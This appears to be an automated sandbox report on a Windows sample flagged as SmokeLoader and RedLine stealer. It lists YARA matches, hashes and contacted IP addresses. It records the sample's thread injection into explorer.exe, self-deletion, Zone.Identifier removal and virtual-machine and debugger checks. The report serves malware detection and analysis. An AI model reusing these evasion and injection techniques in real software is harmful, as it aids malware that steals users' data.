Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_00415BA0		0_2_00415BA0
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_00415BA0		4_2_00415BA0

Source: B995.exe.2.dr

Static PE information: Data appended to the last section found

Source: mGFoU1INUk.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: mGFoU1INUk.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: B995.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ibjgueh.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/3@6/3

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

Code function: 0_2_02C4A58F CreateToolhelp32Snapshot,Module32First,

0_2_02C4A58F

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ibjgueh

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\B995.tmp

Jump to behavior

Source: mGFoU1INUk.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mGFoU1INUk.exe	ReversingLabs: Detection: 36%
Source: mGFoU1INUk.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\mGFoU1INUk.exe "C:\Users\user\Desktop\mGFoU1INUk.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ibjgueh C:\Users\user\AppData\Roaming\ibjgueh
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ibjgueh C:\Users\user\AppData\Roaming\ibjgueh

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Unpacked PE file: 0.2.mGFoU1INUk.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.suhak:W;.fofifuf:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ibjgueh	Unpacked PE file: 4.2.ibjgueh.400000.0.unpack .text:ER;.rdata:R;.data:W;.suhak:W;.fofifuf:W;.rsrc:R; vs .text:EW;

Source: B995.exe.2.dr

Static PE information: real checksum: 0x4843e should be: 0x34aa9

Source: mGFoU1INUk.exe	Static PE information: section name: .suhak
Source: mGFoU1INUk.exe	Static PE information: section name: .fofifuf
Source: B995.exe.2.dr	Static PE information: section name: .kepojon
Source: B995.exe.2.dr	Static PE information: section name: .mizur
Source: ibjgueh.2.dr	Static PE information: section name: .suhak
Source: ibjgueh.2.dr	Static PE information: section name: .fofifuf

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02C4DFE8 push esp; ret	0_2_02C4DFEA
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02C4CE88 pushfd ; iretd	0_2_02C4CE89
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02C4C38B push B63524ADh; retn 001Fh	0_2_02C4C3C2
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02C54992 push ds; iretd	0_2_02C54A41
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02C54570 push eax; iretd	0_2_02C54831
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02FC1540 pushad ; ret	0_2_02FC1550
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02CC1540 pushad ; ret	4_2_02CC1550
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02D0E468 push esp; ret	4_2_02D0E46A
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02D0C80B push B63524ADh; retn 001Fh	4_2_02D0C842
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02D0D308 pushfd ; iretd	4_2_02D0D309

Source: mGFoU1INUk.exe	Static PE information: section name: .text entropy: 7.549565623085082
Source: B995.exe.2.dr	Static PE information: section name: .text entropy: 7.52387746249475
Source: ibjgueh.2.dr	Static PE information: section name: .text entropy: 7.549565623085082

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B995.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ibjgueh			Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ibjgueh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\mgfou1inuk.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\ibjgueh:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\ibjgueh	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\ibjgueh	API/Special instruction interceptor: Address: 7FF8C88ED584

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 422	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2137	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 822	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2669	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 889	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 867	Jump to behavior

Source: C:\Windows\explorer.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B995.exe

Jump to dropped file

Source: C:\Windows\explorer.exe TID: 2616	Thread sleep count: 422 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6284	Thread sleep count: 2137 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6284	Thread sleep time: -213700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1972	Thread sleep count: 822 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1972	Thread sleep time: -82200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6536	Thread sleep count: 292 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4308	Thread sleep count: 339 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4308	Thread sleep time: -33900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3228	Thread sleep count: 297 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6284	Thread sleep count: 2669 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6284	Thread sleep time: -266900s >= -30000s	Jump to behavior

Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.2131329047.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lfons>
Source: explorer.exe, 00000002.00000000.2131329047.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Packages
Source: explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2122929961.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.2125963281.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2123955019.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02C49E6C push dword ptr fs:[00000030h]	0_2_02C49E6C
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]	0_2_02FC0D90
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Code function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]	0_2_02FC092B
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02CC0D90 mov eax, dword ptr fs:[00000030h]	4_2_02CC0D90
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02CC092B mov eax, dword ptr fs:[00000030h]	4_2_02CC092B
Source: C:\Users\user\AppData\Roaming\ibjgueh	Code function: 4_2_02D0A2EC push dword ptr fs:[00000030h]	4_2_02D0A2EC

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: B995.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 119.204.11.2 80	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Thread created: C:\Windows\explorer.exe EIP: 30519A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Thread created: unknown EIP: 88B19A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\mGFoU1INUk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjgueh	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2123767253.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2122433987.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2122001915.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Roaming\ibjgueh

Code function: 6_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_00404E64

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

Code function: 0_2_00415BA0 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,

0_2_00415BA0

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
